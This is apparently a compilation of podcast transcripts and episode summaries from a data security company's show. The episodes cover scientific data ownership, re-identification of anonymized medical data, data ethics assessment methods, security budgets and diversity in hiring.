So I think science can really improve more through the sharing and less through trying to be perfectionist on the people who are generating the data and publishing the stories. I think both are important, but I think there's more opportunity for ensuring reproducibility and that mistakes get fixed by sharing the data.
Cindy Ng: Yeah. And when you're solving really complicated and hard problems, it helps to have many people work on it too, even though it might seem like they're too many chefs in the kitchen, but that it can only help, I imagine.
Lenny Teytelman: Absolutely. That's what peer review is for. It's getting eyeballs with people who have not been listening to you give this presentation evolving over time for the last five years. It's people who don't necessarily trust you the same way or have different strengths. So it does help to have people from the outside take a look.
But even reviewers, they are not going to be rerunning all of your analyses. They're not going to be spending years digging into your data. They're going to read the paper and kind of mostly trying to tell is it's clear? Do I trust what they're saying? Have they done the controls? At the end of the day, figuring out which papers are correct and which hypotheses and conclusions stand the test of time, it really does require time. And that's where sharing the data shortens the time to see what is and isn't true.
We’re in an impermanent phase with technology where circumstances and cyberattacks are not always black or white. Here’s what we’re contending with: would you prefer a medical diagnosis from a human or machine? In another scenario, would a cyberattack on a state’s power grid be an act of war? Officially, it’s not considered so, yet. Or, perhaps a scenario less extreme where you buy a video and then 5 years later, it disappears from your library bc the company where you bought your video from loses the distribution rights. Data ownership is an important part of data security and privacy, but there are no hard and fast rules.
Panelists: Cindy Ng, Mike Thompson, Kilian Englert, Mike Buckbee
Reminder: it's not "your data".
— Lenny Teytelman (@lteytelman) July 16, 2018
It's the patients' data
It's the taxpayers' data
It's the funder's data
-----------------
If you're in industry or self-fund the research & don't publish, then you have the right not to share your data. Otherwise, it's not your data.
A few months ago, I came across Protocols.io founder Lenny Teytelman’s tweet on data ownership. Since we’re in the business of protecting data, I was curious what inspired Lenny to tweet out his value statement and to also learn how academics and science-based businesses approach data analysis and data ownership. We’re in for a real treat because it’s rare that we get to hear what scientists think about data when in search for discoveries and innovations.
Cindy Ng: Welcome, Lenny. We first connected on Twitter through a tweet of yours, and I'm going to read it, it says, "Reminder: it's not 'your data.' It's the patient's data, it's the taxpayers' data. It's the funders' data. And if you're in an industry or self-funded the research and don't publish, then you have the right not to share your data. Otherwise, it's not your data." So can you tell us a little bit more about your point of view, your ideas about data ownership, and what inspired you to tweet out your value statement?
Lenny Teytelman: Thank you, Cindy. So this is something that comes up periodically, more so particularly, in the past 5, 10 years in the research community as different funders and publishers starting more and more intentions of reproducability challenges and published research, and including guidelines and policies that encourage or require the sharing of data as a prerequisite for publication or as a condition of getting funding. So we're seeing more and more of that, and I think the vast majority of the research community, of the scientists, are in favor of those then this time that it's important, then this time that it's one of the pillars of science to be able to reproduce and verify and validate out the people's results and not just to take them at their word. We all make mistakes, right?
But there is a minority that is upset about these kinds of requirements and I, periodically, either in person or someone on Twitter will say, "Hey, I've spent so long sailing the oceans and collecting the data. I don't want to just give it away. I want to spend the next 5, 10 years publishing and then it's my data." And so that's the part that I'm reacting to it. There are some scientists that forget who's funding them and who actually has the rights to the data.
Cindy Ng: Why do they feel like it's their data rather than the patients' data or the taxpayers' data or the funder's data?
Lenny Teytelman: So it's understandable because, particularly when the data generation takes a long time, so imagine you go on an own expeditions two, three months away from family, sampling bacteria in oceans or digging in the desert, and it can take a really long time to get the samples, to get the data, and you start to feel ownership, and it's also the career, your career, the more publications you get on a given dataset, the stronger your resume, the higher the chances of getting fellowships, faculty positions, and so on. People become a little bit possessive and take ownership of the data, if you like, put so much into it, "It's mine."
Cindy Ng: Prior to digitalizing our data, who owned the data?
Lenny Teytelman: Well, I guess, universities can also lay some claim to the intellectual property rights. I'm not an attorney so it's tricky. But I think there was always the understanding in the science world that you should be able to provide the tables, the datasets that you're publishing on request. But then we got paper journals, there really just wasn't space to make all of that available. And we're now in a different environment where we have repositories, there's GitHub focal, there are many repositories for the data to be shared. And so, with the web, we're no longer in that contact author for details and we're now in a place where journals can say, "If you want to publish in our journal, you have to make the data available." And there are some that have put in very stringent data requirement policies.
Cindy Ng: Who sets those parameters in terms of the kind of data you publish and the stringency behind it? Do a bunch of academics come together, chairman, scientists decide best practices, or they vary from publication to publication?
Lenny Teytelman: Both. So it depends on the community. There are some communities, for example, the genomics community, back when the human genome was being sequenced, there were a lot of...and I mean before that, there were a lot of meetings of the leaders in the field sort of agreeing on what are the best practices, and depositing the DNA sequences in the central repository GenBank run by the U.S. government became sort of expected in the community and from the journals. And so, that really was community-led best practices, but more recently, I also see just funders putting out mandates, and when you agree to getting funding, you agree to the data-sharing policies of the foundation. And same thing for journals. Now, journals, more and more of them are putting in statements requiring data, but it doesn't mean that they're necessarily enforcing it, so requirements are one thing, enforcement is another.
Cindy Ng: What is the difference between scientific academic research versus the science-based companies? Because a lot of, for instance, pharmaceuticals hire a lot of PhDs and they must have a close connection between one another.
Lenny Teytelman: So there is certainly overlap. You're right that, I think, in biomedicine particularly, most of the people who get PhDs actually don't stay in academia and then outside of it. Not all of it is in industry. They go through a broad spectrum, all for different careers, but a lot do end up in industry. There is some overlap where you will have industry funding some of the research. So, Novartis could give a grant to UC Berkeley, or British Petroleum could be doing ecological research, and those tend to be very interesting because there may be a push from the industry side to keep the data private, like you can imagine tobacco companies sponsoring something.
So there's some conflict of interest then usually universities try to frame these in a way that gives the researchers the right to publish regardless of what the results are, and to make it available so that the funder does not have a yea or nay vote. So those are on collaboratives side when there's some funding coming in from industry but, in general, there is basic science, there is academic science, and there is expectation there that you're publishing and making the results open, and then there is the industry side, and, of course, I'm broadly generalizing. There are things you will keep private in academia, there's competitiveness in academia as well, you're afraid of getting scooped. But broadly speaking, academia tends to publish and be very open, and your reputation and your career prospects are really tied to your publications.
And on the industry side, it's not so much about the publications as about the actual company bottom line and the vaccines, drug targets, right, molecules that you're discovering, and those you're not necessarily sharing, so there's a lot of research that happens in industry. And my understanding is that the vast majority of it is actually not published.
Cindy Ng: I think even though they have different goals, the thread between all of them really, is the data because regardless of what industry you're in, I hate this phrase, "data is the new oil," but it's considered one of the most valuable assets around. I'm wondering is there a philosophy around how much you share amongst scientists regardless of the industry?
Lenny Teytelman: In academia, it tends to be all over the place. So I think in industry, they're very careful about the security, they're very, very concerned about breach and somebody getting access to the trials, to the molecules they're considering. The competition is very intense and they take the intellectual property and security very seriously. On the academic side, it really varies and there are groups that, even long before they're ready to publish their intel on science, they generate data, they feel like we've done the sequencing of these species or of these tissues from patients, and we're going to anonymize the patient names and release the information and the sequences of the data that we have as soon as we've generated it even before the story is finished so other people can use it.
There are some academic projects that are funded as resources where you are expected to share the data as they come online. There might be requests that you don't publish from the data before we did if they're the ones producing it, so there can be community standards, but there are examples in academia, many examples in academia where the data are shared and simply as they're produced even before publications. And then you also have kind of groups that are extremely secretive. Until they're ready to publish, no one else has access to the data and sometimes even after they publish, they try to prevent other people from getting access to the data.
Cindy Ng: So it's back to the possessiveness aspect of it.
Lenny Teytelman: My feeling just anecdotally from the 13 years that I was at the bench, as a student, post-doc, is that the vast majority of scientists are open and are collaborative in academia and that it's a tiny minority that try to hoard the data, but I'm sure that that does vary by field.
Cindy Ng: In the healthcare industry, it's been shown that people try to anonymize data and release it for researchers to do research on, but then there are also a few security and privacy pros who have said that you can re-identify the anonymized data. Has there been a problem?
Lenny Teytelman: Yes, this is something that comes up a lot in discussions. Everone does when you're working with patient data, every one does go through concerted effort to anonymize the information, but usually, when people opt in to participating in these studies and these types of projects, the disclaimers do warn the patients, do warn the people participating that, yes, we'll go through anonymizing steps, but it is possible to re-identify, as you said, the anonymized, the data and figure out who it really is no matter how hard you try. So there are a lot of conversations in academia about this and it is important to be very clear with patients about it. There are concerns, but I don't know actual examples of people re-identifying for any kind of malicious purpose. There might be space and opportunity for doing that, and I'm not saying the concerns are not valid, but I don't know of examples where this has happened with genomic data, DNA sequencing, or individuals.
Cindy Ng: What about Henrietta Lacks where she was being treated for...I can't remember what problem she had, and then it was a hospital...
Lenny Teytelman: Yes, that's a major...there's a book on this, right, there's a movie. That's a major fiasco and a learning opportunity for the research community where there was no consent.
Cindy Ng: Did you ever see this movie called the "Three Identical Strangers" about triplets who found each other?
Lenny Teytelman: No, I haven't.
Cindy Ng: And then they found that all three of those triplets were adopted, and then they thought, "Hmm, that's really strange." So then they had a wonderful reunion and then, later down the line, they realized that they're being used as a study. There were researchers that went in every single week to their homes, to the adoptee's homes, to do research on the kids, and knew that they're all brothers, but neglected to tell the families until they found each other by chance. And then they realized they're part of a study and they refused to release the data. And so, I found the Henrietta Lacks and this new movie that came out just really fascinating. I mean, I guess that's why they have regulations so that you don't have things like these scenarios happen, where you find out after you're an adult, that you're a part of a strange experiment.
Lenny Teytelman: That's fascinating. So I don't know this movie, but on a related note, I'm thinking back…I don't remember the names, but I'm thinking back on the recent serial killer that was identified, not through his own DNA being in the database, but the relatives participating in ancestry sequencing, right, submitting personal genomics, submitting their cells for genotyping, and the police having access, tracing the serial killer through that. There certainly are implications of the data that we are sharing. I don't know what the biggest concerns are, but there are a lot of fascinating issues that the scientific community, patients, and regulators have to grapple with.
Cindy Ng: So, since you're a geneticist, what do you think about the latest DNA testing companies working with pharmaceuticals in potentially finding cures with a lot of privacy alarms coming up for advocates?
Lenny Teytelman: Yeah, so it has to be done ethically. You do have to think about these issues. My personal feeling is that there's a lot for world and humans to gain from sharing the DNA information and personal information. The positives outweigh the risks. That's a very vague statement, so I do, you know, I think about the opportunity to do studies where a drug is not just tested whether it works or not, but depending on the DNA of the people, you can figure out what are the percolations, what are the types of the drugs that will have adverse reactions to it, who are the ones who are unlikely to benefit from it. So there is such powerful opportunity for good use of this. Obviously, we can't dismiss the privacy risks and the potential for abuse and misuse, but it would be a real shame if we just backed away from the research and from the opportunity that this offers altogether, instead of carefully thinking through the implications and trying to do this in an ethical way.
Systems engineering manager Mike McCabe understands that State, Local and Education (SLED) government agencies want to be responsible stewards of taxpayer’s funds. So it makes sense they want to use security solutions that have proven themselves effective. For the past six years, he’s brought awareness on the tried and true efficacy of how Varonis solutions can secure SLED’s sensitive unstructured data.
In our podcast interview, he explains why data breaches are taking place, why scripts aren’t the answer, and how we’re able to provide critical information about access to SLED’s sensitive data.
We also make time to learn more about what Mike does outside of work and he has great advice on figuring out what to eat for dinner.
Our community is finally discussing whether computer science researchers should be required to disclose negative societal consequences of their work to the public. Computer scientists argue that they aren’t social scientists or philosophers, but caring about the world isn’t about roles, it’s the responsibility of being a citizen of the world. At the very least, researchers ought to be effective communicators. We’ve seen them work with law enforcement and vulnerability announcements. There must be more they can do!
Tool of the week: Wget, Proof of Concept
Panelists: Cindy Ng, Mike Thompson, Kilian Englert, Mike Buckbee
While some of our colleagues geeked out at Blackhat, some of us vicariously experienced it online by following #BHUSA.
The keynote was electric. They’re great ideas and we’ve seen them implemented in certain spaces. However, the reality is, we have a lot more work to do.
There was also a serious talk about burn out, stress, and coping with alcohol as a form of escape. We learned that mental health is growing concern in the security space. As more organizations rely on technology, security pros are called on at all hours of the day to remediate and prevent disasters.
Other articles and tweets discussed:
Over the past six years, Colleen Rafter has been educating Varonis customers on the latest and greatest data security best practices. Share or NTFS permissions? She has an answer for that.
Aware that security pros need to meet the latest GDPR requirements, she has been responsibly reading up on the latest requirements and developing course material for a future class.
In our podcast, Colleen advises new Varonis customers what to do once they have our solutions and which classes to take and in what order.
This week’s podcast was inspired by chief information security officer Wendy Nather’s article, The Security Povery Line and Junk Food. It’s 2018 and we’re still struggling to get a proper security budget. Is it a mindset? Is that why when we hire pen testers to identify vulnerabilities, they’re usually able to gain admin access? On the bright side, a company with a bigger budget, Google recently declared victory with a USB key that prevented phishing for an entire year.
Other articles discussed:
Dr. Gemma Galdon-Clavell is a leading expert on the legal, social, and ethical impact of data and data technologies. As founding partner of Eticas Research & Consulting, she traverses in this world every day, working with innovators, businesses, and governments who are are considering the ethical and societal ramifications of implementing new technology in our world.
We continue our discussion with Gemma. In this segment, she points out the significant contribution Volvo made when they opened their seat belt patent. Their aim was to build trust and security with drivers and passengers.
Gemma also points out that we should be mindful of the long-term drawbacks if you ever encounter a data breach or a trust issue - unfortunately, you’re going to lose credibility as well.
Cindy Ng: Welcome, Gemma. When companies come to you with a new product or service, they understand that going to market and dominating the entire space is almost everything. There's a huge tension between the organization as well as regulatory pull, making sure that you meet the legal requirements. Companies are trying to bring products to market as fast as possible. That's an industry problem.
Gemma Galdon-Clavell: Well, that tension exists and it will continue to exist. I think that we are currently working with pioneers and we're very aware of that. We don't hope to work with everyone tomorrow. We need to work with the ones that are gonna change the rules and that's what we find fascinating about our work. We don't wanna mass produce ethical impact assessments. We wanna help the world come up with better technological solutions to its problem. So, of course, we experience that tension. We are contacted sometimes by some people that don't really believe in what we do. So, they have been told by somebody else who does see their problem that they should work with us, but then maybe that person was higher up and then the person who contacted us is legal management. And they're very skeptical about our work.
I think that in all of our projects in the end, they do realize that there's value in what we bring in. But again, we are working with the ones that wanna shape the future and not do things that we're not interested in. Just, I mean, think about Volvo, for instance, and cars. I usually use the analogy of cars because cars were not conceived with seat belts, for instance, or speed limits. These are things that, as a society, we agreed over time that these were the necessary precautions that we wanted to make the most of cars and vehicles, while at the same time protecting society. And when society start thinking about what the limits your cars be, seat belts were not immediately on the table.
And then there was a company, Volvo, that came up with this innovation and thought, "Well, if we offer seat belts in our cars, then we can create more trust and provide more security to our customers." And what they did was they released the patent. They did not just put seat belts in their cars, but they said, "We actually want the industry to adopt this. We want this to be the standard." And they gave it away for free. Today, all cars have seat belts. No one would dream of buying a car without a seat belt and Volvo is still seen as a company that sells security. So, these are the people we wanna work with. We wanna work with people that are willing to be disruptive in their industries, not the people that just wanna do same old, same old.
Gemma Galdon-Clavell: I think they've tried. I wouldn't be able to tell you whether they were right. We have seen some clients be very clear in saying that they realize how much they've lost. That they have lost a lot of money by not doing things well. And not just money in terms of what I said before, you know, you're coming up with a pilot that doesn't sell is hugely costly. It might not be as visible as a data breach, but if you produce something that in the end no one wants because you didn't take into account people's stress or acceptability, then you're gonna lose a lot of money. And if there’s a data breach or a trust issue, then you're going to lose credibility as well. So, you're gonna have reputational problem. So, I think it is about dollars and cents, but it's also about the long-term effect.
So, I think that the companies that we work with are increasingly incorporating privacy and data ethics as part of their risk assessment. And that's what we would like to see. We'd like to see privacy and ethics being mainstreamed in the usual processes of any large corporation that deals with technology.
Cindy Ng: And alternatively, have your researchers been able to quantify how much they would potentially save when they work with you and seeking out your counsel?
Gemma Galdon-Clavell: It really depends on the project. What we have often done is when we were ask to contribute to developing a specific piece of new technology with the company, what we do is state their economic forecasts, and tell them what it is went wrong, what did you spend all this money in creating and developing this new product. And then you couldn't tell us. So, our estimates of savings are based on their estimates of potential profit. That's how we do it and sometimes we have told them, "Well, imagine if you were not able to sell it," that's one scenario like, there's an acceptability issue and so, you just sell a few hundreds. And so, it doesn't become a viable market alternative. But there's another scenario, when there's a data breach or a trust issue. And then it's not only about the money that you’ve spent, but also the money you need to spend in the future to resolve or to redress that problem that you've had with your existing or potential clients.
So, there's these different scenarios depending on when things go wrong. But it's very likely that if you're not careful with your data processes at some point or other, you will run into problems with the regulator, with your own clients, or with society as well since you're gonna end up making the headlines for that bad data practices.
Cindy Ng: The Guardian published an article the other day about the Australian government, how they released anonymized data sets, lots of medical records including prescriptions, surgeries for millions of people. And researchers, they've been able to re-identify those people. And I'm wondering if they would come to you after the media announcement, is that when you take on a client?
Gemma Galdon-Clavell: We usually take them earlier. Once they have such a huge issue, we work with neighboring countries, but not with Australia. But in this case, it's clearly a case of not having as specific procedure to do open data. I mean, clearly, the government's gonna have all this information and clearly, the government needs to have all this information because you do wanna make sure that your doctor is aware the procedures you had before and your condition. You should also have a right to access your medical records. So, that data has to exist and it needs be somewhere.
But then you need accurate based encryption, you need to make sure that that information can only be accessed by the right people. And if you do open data because you want that data to be aggregated and you want universities and private partners to make the most of that data, then you need to go through the appropriate safeguards. And we have specific methodologies to do open data like how to anonymize in a way you still can derive a value from that data, but the data does not include all those small pieces of private information that you don't wanna see really.
So, clearly, the Australian government did not have an open data policy or the appropriate profiles of people in place to make sure that that was done responsibly. And it's really terrible that, in 2018, you have major governments not being aware of these issues and they don't have procedures before data goes out there to make sure that this doesn't happen.
I think that this is changing to a large extent in Europe. We are working a lot with Latin America as well and I think that governments there realize that if they wanna make the most of the data revolution, they need to do it responsibly because otherwise, the trust and liability issues are too great. But unfortunately, it doesn't seem like the government in Australia was aware of that or have the procedures. We've seen that in other countries as well, but I think that there's more and more of an awareness of the need to undertake these things before disaster strikes.
Gemma Galdon-Clavell: This is one of our greatest concerns. There's a lot of people...well, not a lot, but there's some people who use privacy just as a PR thing. And they don't really change their practices. And that is clearly a matter of concern. And that's why we need standard because otherwise, it's gonna become a PR thing. And your technical standards and your privacy safeguards should not be a PR thing. It should be part of your core business and your core specifications.
So, one of the things we try and do is...and we're trying to develop a certificate, a way of certifying those companies that say what they do and do what they say, so to speak, to provide consumers and their customers with more assurances as to what it is that they're actually being offered. And making sure that it's not just cosmetic things, or a PR strategy that has no relationship with actual data practices. So, we think that certification is the way to go and we're gonna be very active in the coming months precisely in providing certification for the companies that wanna sell privacy or that they say that they use privacy and responsible data processes in their products.
Cindy Ng: And finally, I know you work with a lot of pioneers. So, I don't know how open you can be about your projects, but I'd love to hear a successful project that you've been able to deploy.
Gemma Galdon-Clavell: Our contributions are usually part of larger projects. So, for instance, in Europe in the development of the...what I called ABC gates(Automated Border Control) I guess, everyone is familiar with them by now, the kiosks that look at your passport when you go through an airport. You may have seen that sometimes there's no...you don't have a border mark anymore. But there's a machine that checks your passport and your biometric data, and decides whether you can enter a country or not. When the European Commission initially started developing that, they realized that it was important to incorporate ethics and responsible data processes in that. And so, we've been helping the industry for the last five years in making sure that the way that your biometrics are taken and that the identification happens is responsible. And that the data processes that are in place are responsible and accountable. So, I think that's one of the success, for instance, that we have.
We've also been working with a lot of public administration in improving their procurement practices. Buying technology is a crucial part of doing technology responsibly, making sure that when you buy technology, you buy the best technology out there, and that you buy technologies that incorporate data ethics and cyber security, and privacy concerns, how to improve the procurement processes to protect public administration. But also buy better technologies that are gonna be better integrated in your existing data processes. So, that's... I think that we have several success cases there and we think there are several administrations that are currently buying better technology and doing it better, and having a more informed team of staff that is more aware of the risks of incorporating new technologies there in their processes.
We’re also currently...and these are ongoing things, so, we don't really have results yet, but we are working with several international organizations that fund technology development in making sure that ethics and responsible data processes are part of the things that they assess when they provide funding for innovation. So, anyone that would come to those international organizations would need to prove that they're aware of the social impact of the technology they're trying develop and that they are building the necessary safeguards to make sure that that technology is responsible.
There's quite a lot of examples out there of things that can be done in practice to improve the way that we do technology and the way that technology impact on society and we're very proud to have been part of that. And we hope to continue to be part of that story for a long time.
Cindy Ng: Thank you so much. I'm so inspired by what you do. So, I wish you much success.
Gemma Galdon-Clavell: Thank you so much.
I wanted to better understand how to manage our moral and business dilemmas, so I enlisted data & ethics expert Dr. Gemma Galdon-Clavell to speak about her leadership in this space. As founding partner of Eticas Research & Consulting, she traverses in this world every day, working with innovators, businesses, and governments who are are considering the ethical and societal ramifications of implementing new technology in our world.
In the first part of our interview, Gemma explains why we get ethics fatigue. Unfortunately, those who want to improve our world are consistently told that they're not doing enough. She also gives us great tips on creating products that have desirability, social acceptability, ethics, and good data management practices.
Cindy Ng: Welcome, Gemma. What caught my eye was a quote you said that if we keep talking about our moral obligations and ethical concerns in technology not offering solutions, people are gonna zone out. We want security and privacy. We want economic prosperity and sustainability. We want safety, but not willing to sacrifice some freedoms. Can you talk a little bit about ethics fatigue and some might also call it moral overload?
Gemma Galdon-Clavell: Working in this field, we've been saying what's wrong for a long, long time. But you don't see that many voices out there that are offering solutions. And it seems like any effort you make is never good enough. And that is really frustrating. That can be really frustrating for someone who has really good intentions and their willingness to improve their practices. So, I think that when you're maybe doing academia or just commenting on things, it's easy to take that position. I think it's really good to have people that say what is going wrong, but it's also important that we have ways of defining what it means to do it well, and spaces, organizations, individual that help you do it better. And hopefully over time, as a society, we will agree on what kind of compromises we want to make or whether we wanna make those compromises.
But I think that there has to be some ability to improve and not just always be subject to criticism. When you speak out and you're willing to recognize that you have vulnerabilities, if everyone comes down on you, then you will not be motivated to improve your practices. And I think that's what ethics fatigue will be. So when people are like, "Listen, you had my ear for some time. I was willing to do things better, but if all you have is just more criticism and say that if there's no way to improve this, then people are just gonna shut off." And I think that's the worst outcome we could hope for. So, I'm hoping that through presenting actual practices in ways of doing things better and in doing things well, we can avoid that scenario.
Gemma Galdon-Clavell: Sure. I think we're very lucky that at the very beginning of my work, I was asked by actual people with real problems to see how my knowledge and the things that I have experienced on could help them improve understandings and practices. And so, that forced me to become very practical from day one. And initially when I started working with those actors, I thought, you know, "I'm sure there's gonna be some methodology out there in some book, or people that know a lot more than me that have this before." And what I found was that there was no methodology that was adequate to assess data and privacy risk. There was not enough there that was structured that would fit these things. There was a lot on the impact of technology, on environmental impact assessment, as well as things that were loosely related, and things that I could learn from, but not something that I could readily implement in my work.
So, I basically have to design my own methodology, listening to these private and public actors, but also reading a lot of the literature and talking to a lot of people. So, I think that in the end, what we have is a robust way of addressing social, ethical and privacy risks when developing any data process or data policy as well. And that's been the outcome of a lot of work by a lot of people and a lot of getting the best of great minds together. And I think that's what makes our work different from a lot of what you find out there. We actually get done with the actual problems. But there are shortcomings in what we do. I often say that ideally, you would wanna think about the desirability of what you're doing before you actually start conceiving a new project. And in the real world when people come to you, someone out there has already decided that that new product or new policy is desirable. And so, you cannot really impact in that part of the process, but then we can look at their data management practices, and their ethics, and their legal compliance, and the desirability issues, and we can incorporate the stakeholders.
So, even if we are contacted later on or after a privacy disaster, there's still a lot that we can do. But of course, in the future, what we would like is for no agency or actor to get into developing anything without having some safeguards in place. If you're developing new chemical materials, you would never think of selling something before it runs through with the appropriate safeguards. If you're developing a new drug, you would not dream of putting it in the market and selling it before you've proved that you've gone through the precautionary principle, and you've gone through the development agencies to be validated to your initiative. How come in engineering, that is not the case? How come all these things are making it to the market without no way for society or the regulator to see what the social or legal impact of those new devices or initiatives for data processes would be? That, we're trying to solve.
So, even if we're contacted later on, there's still a lot that we can do. But also, we hope that over time, we'll convince our clients that they need to come to us right at the beginning of developing their new ideas.
Gemma Galdon-Clavell: Sure. I mean these are the four steps that we think are necessary for you to, not only to assess the risks of your product, but also to accompany the process of developing it. So, this is from the very conception of the project or initiative until the very end in the implementation. And the first step is to consider the desirability, like does society need this? We think that in technology, there's a lot of people that come up with new technologies and then look for problems in their new technology. And that should not be the case. You should develop technology because you have a problem that you wanna solve. That is the productive, innovative way of doing thing.
There's something you wanna solve like the quality of life of older people, or the quality of life of people with disabilities, or address discrimination in a sector or industry. So, you have a problem and then you look for a solution that maybe technology calls. That's the train of thought you wanna follow, but in technology, that's not always followed. So, we wanna make sure that that is the case.
But we also wanna make sure that you go beyond having a great idea. I always say that having a great idea is just the beginning. It's only the starting point. You need to plan all the way through implementation. We see so many technologies that are great ideas, but once they're out there, no one plans for, for instance, training the people that are gonna be using that technology, if you're offering that technology to third-parties, for instance. So, if you don't take that into account, the people that are mediating your relationship with the client have no idea what they're doing. And so, of course, the way that the client is gonna see that technology is not gonna be as good. I think the person in the middle knew about what they were talking about and the possibilities of that technology. So, are you planning for implementation and not just having the great idea.
So, ideally, in desirability, you would go through all these, making sure you have a thorough plan that actually solves the problem. So, that's the first pillar.
The second pillar is social acceptability. I think we've all learned with design thinking and service design that clients and stakeholders and people are just really important. You don't wanna develop technologies that then no one really use. I mean, think Google Glass. You this great idea in the lab, but then actually no one thinks that that's useful. You wanna avoid spending all that money in a pilot that in the end, no one's gonna use. And you do that by talking to people. And there's methodologies and ways of making sure that you understand your potential client and you're building trust in your system. You may even go as far as having mechanisms for them to intervene even after the technology has been in the market. So, you see what their feedback is. So, it's some techniques from marketing, but adapted to these understanding of the social impact of technology.
Then we also wanna look at legal compliance, of course. You would need to comply with the law, and here, there are so many industries that have suffered for not doing this. Think about the drone industry, for instance. A few years ago, everyone thought that drones are gonna be this next thing that you were gonna have your home deliveries come to you by drones and they have to invest a lot of money in this new technology because everyone was gonna be using drones. That didn't happen because we didn't have a legal framework. If you have come to us five years ago, we could have told you the most likely thing is that drones are used in some rural areas and for crisis management. But they're not gonna be an everyday thing in the next 10 years. And then you would have saved a lot of money and you would have invested maybe in another technology that was more promising. So, fulfilling the law is really, really important.
But there's also things that are not part of the law that inform our laws, like social cohesion or trust. So, we also look at how those things are impacted by your technology. What is the impact of your technology or the data process on social cohesion and trust between actors. Because these are not things...there's no laws about trust, but it's such an important part of how our society are. And it's important to have a specific emphasis put on that. So, that is the legal pillar of our assessment.
And then finally, data management. I always say that data management is the source of all problems, but also the source of all solutions. So, what we do here is we map the data life cycle, any piece of data that get into your system, we look at their vulnerabilities and their moments of vulnerabilities. So, there is five moments of vulnerability in every data that gets into your system: the moment of collection, the moment of storage, the moment of sharing, the moment of analysis, and the moment of deletion. In those five moments, things can go wrong. And so, what we do is...what we've learned in the other pillars, we build specific mitigation measures in your system to make sure that you have encryption mechanisms in place, that you anonymize if that is needed, that you minimize the data that you use in your system, that you have relevant contract with the processors to protect your liability in case there's a data breach. So, in the end, we'll make your system more robust through following these four main pillars of emphasis.
When we create new technologies, we want security and privacy, economic prosperity and sustainability, accountability but insist on confidentiality. The reality is that it is difficult to embed all of these values in one pass. As technologies get built, it also elucidates some values we hold to a higher regard than others.
To cope with moral overload, some have suggested that we start designing security and privacy controls as a gradient. Or perhaps certain controls get a toggle on/off switch.
We’re also seeing this moral dilemma in AI – is the technology too volatile or perhaps proper data governance is the answer?
Other articles discussed:
For years, technologists wondered why the law can’t keep pace with technology. Instead of waiting for the government to pass a regulation, should we enlist private companies to regulate?
However, in a recent interview with privacy and cybersecurity attorney Camille Stewart, she said that laws are built in the same way a lot of technologies are built: in the form of a framework. That way, it leaves room and flexibility so that technology can continue to evolve.
While technologists and attorneys continue that debate, the US Federal Trade Commission is hard at work. They recently announced, “If a company chooses to implement some or all of GDPR across their entire operations, and makes promises to U.S. consumers about their specific practices,” they must live up to those commitments, otherwise the FTC could initiate an enforcement action if the company does not comply with” the EU data protection promises for U.S. customers.
Other articles discussed:
Panelists: Cindy Ng, Mike Buckbee, Forrest Temple, Kris Keyser
There are many advantages to being first, especially in the business world. Securing a first place finish usually rewards the winner with monopoly-like status and securing the largest and most dominant market share. A byproduct, however, of the winner takes all mentality is sacrificing security. That’s what Thomas Dullien, Google Project Zero presenter suggested in his latest presentation on the relationship between complexity and failure of security. He is onto something because we’re seeing strange incidents occur that we would have never imagined. A Melbourne man got shot because his image in Google’s database is associated with criminals. A contractor’s access passes were revoked because his direct manager didn’t perform his entitlement reviews. What’s going on?
Other articles discussed:
In part two of my interview with Allison F. Avery, a Senior Diversity & Inclusion Specialist at NYU Langone Medical Center, she clarified common misconceptions about Diversity & Inclusion (D&I) and offered a framework and methodology to implement D&I. She reminded me, “You should not be doing diversity for diversity sake.”
Allison Avery: I'm going to challenge your question a little bit, because I think that people dichotomize those two things as, you know, do you either want diversity, or do you want "quality"? And I think that those two things get pitted against each other as though they're one mutually exclusive or in competition with each other, and that you have to choose. And I think that even looking at it that way puts people into a mind pretzel, and makes diversity seem antithetical to being a top talent place, and being a top talent institution. And I think it gives diversity a bad name, but it also kind of feeds in this kind of mythology that somehow diversity is lowering standards, or diversity is compromised. And I think that whenever we get into this bind of doing things differently, our brains get into this idea that somehow, whenever we go against the grain, that all of a sudden we're compromising our standards.
But all we're doing is one, either changing our standards for something that we have prioritized for a different reason or rationale. One, we need to fully understand what that rationale is, and if we don't that's when we tend to dichotomize, because we don't really understand the value of diversity, and what the sort of actual benefits of having a socially diverse workforce is, and you know the fact of the matter is it does lead to greater creativity, greater financial gains, and greater innovation, and greater research. I mean, that has been substantiated in multiple research, pervasive throughout different industries and in multiple different ways from innovation creativity to financial gains. That's just kind of time and time again.
There is a big financial case for diversity, and how it does literally make you smarter, more creative and more conscious. Julie Peeler who's the foundation director of the International Information Systems Security Certification Consortium, you know, was sort of citing in March how there's...you know, there's about 30,000 open positions in U.S. information security, and how the gap is growing wider and wider. It's actually easier and we've noticed this actually in medical school as well. It's easier at times to train people in skill development, than it is in human skill development, and what we've noticed that is that certain areas of aspects of diversity, and what should be needed for tech in the 21st century, and tech for the next coming 50 plus years are the communication and analytical skills, and participation decision making. Women in leadership positions tend to be more engaged in being able to do that.
They tend to be able to be more collaborative. We've also noticed that in medical school, that it's easier to teach somebody some of the hard "skills" and it's harder to teach somebody some of the soft skills. Harder to teach somebody some of the needs of a diverse community, but it's easier to teach them some of the hard skills that they're going to need. So if they have somewhat of an orientation, if they have potential, if they have capacity, if they have the ability to learn, and those are things that you can test for if you look at some psychometrics testing, if you look at some actual like organizational development testing.
You can utilize that or leverage that within your hiring system. So looking at a person's aptitude for learning, as opposed to just being a hard and fast person on a skill acquisition. So the potential for a person to be able to learn a new skill, or to be able to acquire a new skill, you can test for that through some psychometric testing. You get somebody who's good at like organizational development, or organizational psych, and you input that within your structural system in your hiring manager, and you can test for that and that might increase aspects of your diverse workforce, as opposed to being hard and fast about you need to know this still today. As opposed to we can teach you this skill, but you're coming in with some of these other desired skills, and be more competency based.
So we've noticed that when we switched to a more competency-based...so this person has the ability to deal with ambiguity. This person has better communication skills, this person has the capacity for critical thinking, so when we switch to what kind of culture do we want, what type of learner do we want, what type of capacities do we want and competencies do we want, then that changes the methodology and changes are hard and fast orientation to you need to know this, this, this, this and this skill. It's like we can teach you this skill, but we need you to have these levels of competency, because that's a culture we're trying to build. That's the community that we're trying to cultivate, and that's the innovation that we're trying to have within our organization to get to where we want to be.
A person who is not able to engage in lifelong learning, period, and lifelong professional skill development generally is not the kind of person that you want in your organization anyway. And so it's...I think when you juxtapose diversity and or skill, that's not even the right model or methodology for any industry really.
For the 21st century, our talent innovation does say that employees at companies with diversity and management, are 45% more likely to report growing market share for their companies, and they're 70% likelier to report that their companies captured a new market.
